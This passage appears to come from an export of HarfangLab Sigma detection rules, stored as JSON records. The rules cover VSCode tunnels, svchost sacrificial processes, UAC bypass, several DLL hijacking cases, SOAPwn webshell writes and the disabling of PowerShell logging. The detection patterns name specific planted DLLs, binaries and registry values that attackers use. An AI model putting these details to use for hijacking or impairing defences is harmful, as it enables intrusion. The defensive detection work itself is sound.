strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "17d344bd-5969-438e-b896-775f30a96618", + "rule_name": "VSCode Proxy Tunnel Started via Command-line (Windows)", + "rule_description": "This rule detects the VSCode binary being used 
with a command-line indicating a network tunnel.\nSince July 2023, Microsoft has added a feature that allows users to share their Visual Studio Desktop on the web through its own tunnel.\nThis allows attackers to connect to a remote machine and potentially bypass any network counter-measures.\nIt is recommended to investigate the actions performed in the shell that this tunnel spawns to determine if it is legitimate developer activity.\n", + "rule_creation_date": "2023-09-25", + "rule_modified_date": "2025-03-31", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.command_and_control", + "attack.exfiltration" + ], + "rule_technique_tags": [ + "attack.t1090", + "attack.t1567", + "attack.t1572" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "18048693-66e0-4701-b874-e81772fd4433", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.627316Z", + "creation_date": "2026-03-23T11:45:34.627318Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.627323Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + 
"https://cybersync.org/blogs-en/hunting_cobalt_strike_in_memory", + "https://attack.mitre.org/techniques/T1055/" + ], + "name": "t1055_sacrificial_process_svchost.yml", + "content": "title: Svchost.exe Sacrificial Process Spawned\nid: 18048693-66e0-4701-b874-e81772fd4433\ndescription: |\n Detects the suspicious execution of the legitimate svchost.exe Windows binary, spawned without arguments. This can mean that the binary is being used as a sacrificial process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n This technique is used, for example, by Cobalt Strike.\n It is recommended to investigate the parent process performing this action and the destination IP address of the svchost.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://cybersync.org/blogs-en/hunting_cobalt_strike_in_memory\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/03/29\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.ProcessTampering\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine: '?:\\Windows\\system32\\svchost.exe'\n\n # This is handled by the rule 2fe027bc-7a3c-412a-9493-8581215d5157\n filter_computrace:\n ParentImage:\n - '?:\\Windows\\System32\\rpcnetp.exe'\n - '?:\\Windows\\SysWOW64\\rpcnet.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "18048693-66e0-4701-b874-e81772fd4433", + "rule_name": "Svchost.exe Sacrificial Process Spawned", + "rule_description": "Detects the suspicious execution of the legitimate svchost.exe Windows 
binary, spawned without arguments. This can mean that the binary is being used as a sacrificial process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nThis technique is used, for example, by Cobalt Strike.\nIt is recommended to investigate the parent process performing this action and the destination IP address of the svchost.exe process to determine the legitimacy of this behavior.\n", + "rule_creation_date": "2024-03-29", + "rule_modified_date": "2026-02-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1055" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1827b106-4555-4cda-9f03-7095766f3505", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.074260Z", + "creation_date": "2026-03-23T11:45:34.074262Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.074267Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.greyhathacker.net/?p=796", + 
"https://attack.mitre.org/techniques/T1548/002/" + ], + "name": "t1548_002_post_uac_bypass_cliconfg.yml", + "content": "title: UAC Bypass Executed via cliconfg\nid: 1827b106-4555-4cda-9f03-7095766f3505\ndescription: |\n Detects a process being spawned by cliconfg.exe.\n Cliconfg.exe does not normally spawn any process, this action is probably the result of an UAC bypass attempt.\n Adversaries may bypass UAC mechanisms to elevate process privileges on a system to perform a task under administrator-level permissions.\n It is recommended to investigate the context of this action to determine its legitimacy.\nreferences:\n - https://www.greyhathacker.net/?p=796\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/11/17\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\cliconfg.exe'\n\n condition: selection\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1827b106-4555-4cda-9f03-7095766f3505", + "rule_name": "UAC Bypass Executed via cliconfg", + "rule_description": "Detects a process being spawned by cliconfg.exe.\nCliconfg.exe does not normally spawn any process, this action is probably the result of an UAC bypass attempt.\nAdversaries may bypass UAC mechanisms to elevate process privileges on a system to perform a task under administrator-level permissions.\nIt is recommended to investigate the context of this action to determine its legitimacy.\n", + "rule_creation_date": "2020-11-17", + "rule_modified_date": "2025-02-04", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + 
"attack.t1548.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "18606208-5435-42c6-b17a-7b5ceacc248e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.618797Z", + "creation_date": "2026-03-23T11:45:34.618799Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.618804Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.trendmicro.com/en_us/research/24/c/earth-krahang.html", + "https://redalert.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/", + "https://unit42.paloaltonetworks.com/dll-hijacking-techniques/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_fontsets.yml", + "content": "title: DLL Hijacking via FontSets.exe\nid: 18606208-5435-42c6-b17a-7b5ceacc248e\ndescription: |\n Detects potential Windows DLL Hijacking via FontSets.exe related to Neuber Software Typograf font manager.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this 
technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/en_us/research/24/c/earth-krahang.html\n - https://redalert.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/\n - https://unit42.paloaltonetworks.com/dll-hijacking-techniques/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/03/20\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ttfman.exe'\n ImageLoaded|endswith: '\\FaultRep.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\typograf\\'\n - '?:\\Program Files (x86)\\typograf\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\typograf\\'\n - '?:\\Program Files (x86)\\typograf\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'A. & M. 
Neuber Software'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "18606208-5435-42c6-b17a-7b5ceacc248e", + "rule_name": "DLL Hijacking via FontSets.exe", + "rule_description": "Detects potential Windows DLL Hijacking via FontSets.exe related to Neuber Software Typograf font manager.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2024-03-20", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1878e97a-df8d-4dd8-82f0-e84edc867171", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "critical", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": 
[], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.623606Z", + "creation_date": "2026-03-23T11:45:34.623608Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.623612Z", + "rule_level": "critical", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://labs.watchtowr.com/soapwn-pwning-net-framework-applications-through-http-client-proxies-and-wsdl/?1", + "https://attack.mitre.org/techniques/T1190/" + ], + "name": "t1190_soapwn.yml", + "content": "title: IIS SOAPwn Vulnerability Exploited\nid: 1878e97a-df8d-4dd8-82f0-e84edc867171\ndescription: |\n Detects a suspicious file creation or modification potentially caused by .NET Framework SOAP/WSDL proxy abuse (SOAPwn).\n Vulnerable applications may be coerced into writing arbitrary files via attacker-controlled WSDL or proxy URLs using non-HTTP schemes.\n It is recommended to analyze the content of the XML file for any suspicious content related to a webshell.\nreferences:\n - https://labs.watchtowr.com/soapwn-pwning-net-framework-applications-through-http-client-proxies-and-wsdl/?1\n - https://attack.mitre.org/techniques/T1190/\ndate: 2025/12/12\nmodified: 2026/01/27\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - attack.persistence\n - attack.t1505.003\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_event\ndetection:\n selection:\n Kind: 'write'\n ProcessImage|endswith:\n - '\\w3wp.exe'\n - '\\iisexpress.exe'\n - '\\dotnet.exe'\n FirstBytes|startswith: '3c3f786d6c20'\n Path|endswith:\n - '.cshtml'\n - '.aspx'\n - '.asp'\n - '.ashx'\n - '.asmx'\n - '.ascx'\n - '.asax'\n\n condition: selection\nlevel: critical\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + 
"rule_level_override": null, + "rule_id": "1878e97a-df8d-4dd8-82f0-e84edc867171", + "rule_name": "IIS SOAPwn Vulnerability Exploited", + "rule_description": "Detects a suspicious file creation or modification potentially caused by .NET Framework SOAP/WSDL proxy abuse (SOAPwn).\nVulnerable applications may be coerced into writing arbitrary files via attacker-controlled WSDL or proxy URLs using non-HTTP schemes.\nIt is recommended to analyze the content of the XML file for any suspicious content related to a webshell.\n", + "rule_creation_date": "2025-12-12", + "rule_modified_date": "2026-01-27", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.initial_access", + "attack.persistence" + ], + "rule_technique_tags": [ + "attack.t1190", + "attack.t1505.003" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "189eeb83-5aec-4186-97ea-ad22929a4f15", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.610304Z", + "creation_date": "2026-03-23T11:45:34.610308Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.610315Z", + "rule_level": "medium", + "rule_confidence": "moderate", + 
"rule_confidence_override": null, + "references": [ + "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/user-account-control/settings-and-configuration", + "https://medium.com/@boutnaru/the-windows-process-journey-useraccountcontrolsettings-exe-3d8b88cc944d", + "https://attack.mitre.org/techniques/T1548/" + ], + "name": "t1548_uac_consent_config_disabled_manually.yml", + "content": "title: UAC Registry Configuration Disabled Manually\nid: 189eeb83-5aec-4186-97ea-ad22929a4f15\ndescription: |\n Detects a change in the User Account Control registry configuration.\n This rule detects the complete disabling of the UAC consent window performed manually via the legitimate UserAccountControlSettings.exe binary.\n Attackers may change this configuration in order to locally elevate privileges quietly or allow future attackers to do so.\n It is recommended to investigate actions taken during this user session, to look for subsequent suspicious actions performed on the host and to determine whether the user performing these actions has been compromised.\nreferences:\n - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/user-account-control/settings-and-configuration\n - https://medium.com/@boutnaru/the-windows-process-journey-useraccountcontrolsettings-exe-3d8b88cc944d\n - https://attack.mitre.org/techniques/T1548/\ndate: 2024/10/23\nmodified: 2025/10/03\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin'\n 
Details: 'DWORD (0x00000000)'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\DllHost.exe /Processid:{EA2C6B24-C590-457B-BAC8-4A0F9B13B5B8}'\n - '?:\\Windows\\SysWOW64\\DllHost.exe /Processid:{EA2C6B24-C590-457B-BAC8-4A0F9B13B5B8}'\n\n condition: selection\nlevel: medium\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "189eeb83-5aec-4186-97ea-ad22929a4f15", + "rule_name": "UAC Registry Configuration Disabled Manually", + "rule_description": "Detects a change in the User Account Control registry configuration.\nThis rule detects the complete disabling of the UAC consent window performed manually via the legitimate UserAccountControlSettings.exe binary.\nAttackers may change this configuration in order to locally elevate privileges quietly or allow future attackers to do so.\nIt is recommended to investigate actions taken during this user session, to look for subsequent suspicious actions performed on the host and to determine whether the user performing these actions has been compromised.\n", + "rule_creation_date": "2024-10-23", + "rule_modified_date": "2025-10-03", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1548" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "18ae8604-550e-4ae2-a46b-dd87ad258288", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": 
{ + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.602362Z", + "creation_date": "2026-03-23T11:45:34.602366Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.602373Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_ehstorauthn.yml", + "content": "title: DLL Hijacking via ehstorauthn.exe\nid: 18ae8604-550e-4ae2-a46b-dd87ad258288\ndescription: |\n Detects potential Windows DLL Hijacking via ehstorauthn.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n 
product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ehstorauthn.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\UxTheme.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "18ae8604-550e-4ae2-a46b-dd87ad258288", + "rule_name": "DLL Hijacking via ehstorauthn.exe", + "rule_description": "Detects potential Windows DLL Hijacking via ehstorauthn.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "18fb7194-8782-460e-b4ef-73265aabdd6b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + 
"effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.591625Z", + "creation_date": "2026-03-23T11:45:34.591628Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.591636Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://github.com/xforcered/WFH", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_rmttpmvscmgrsvr.yml", + "content": "title: DLL Hijacking via rmttpmvscmgrsvr.exe\nid: 18fb7194-8782-460e-b4ef-73265aabdd6b\ndescription: |\n Detects potential Windows DLL Hijacking via rmttpmvscmgrsvr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - 
https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rmttpmvscmgrsvr.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - '\\profapi.dll'\n - '\\winscard.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "18fb7194-8782-460e-b4ef-73265aabdd6b", + "rule_name": "DLL Hijacking via rmttpmvscmgrsvr.exe", + "rule_description": "Detects potential Windows DLL Hijacking via rmttpmvscmgrsvr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + 
"rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "191f1aa8-40cc-4b37-b39c-8821d11b97d5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.623027Z", + "creation_date": "2026-03-23T11:45:34.623029Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.623033Z", + "rule_level": "medium", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell/tree/master?tab=readme-ov-file#disable-script-logging", + "https://attack.mitre.org/techniques/T1112/", + "https://attack.mitre.org/techniques/T1562/001/" + ], + "name": "t1112_script_block_logging_disabled_registry.yml", + "content": "title: Script Block Logging Disabled in Registry\nid: 191f1aa8-40cc-4b37-b39c-8821d11b97d5\ndescription: |\n Detects the EnableScriptBlockLogging value being set to 0 in registry.\n Attackers can disable the 
logging of PowerShell scripts by changing the value of EnableScriptBlockLogging to 0 in registry in order to avoid PowerShell detections.\n It is recommended to investigate the process that did this modification, as well as its execution context.\nreferences:\n - https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell/tree/master?tab=readme-ov-file#disable-script-logging\n - https://attack.mitre.org/techniques/T1112/\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2025/08/29\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n Details: 'DWORD (0x00000000)'\n TargetObject|contains: 'EnableScriptBlockLogging'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_lgpo:\n ProcessImage|endswith: '\\LGPO.exe'\n ProcessSignature: 'Microsoft Corporation'\n 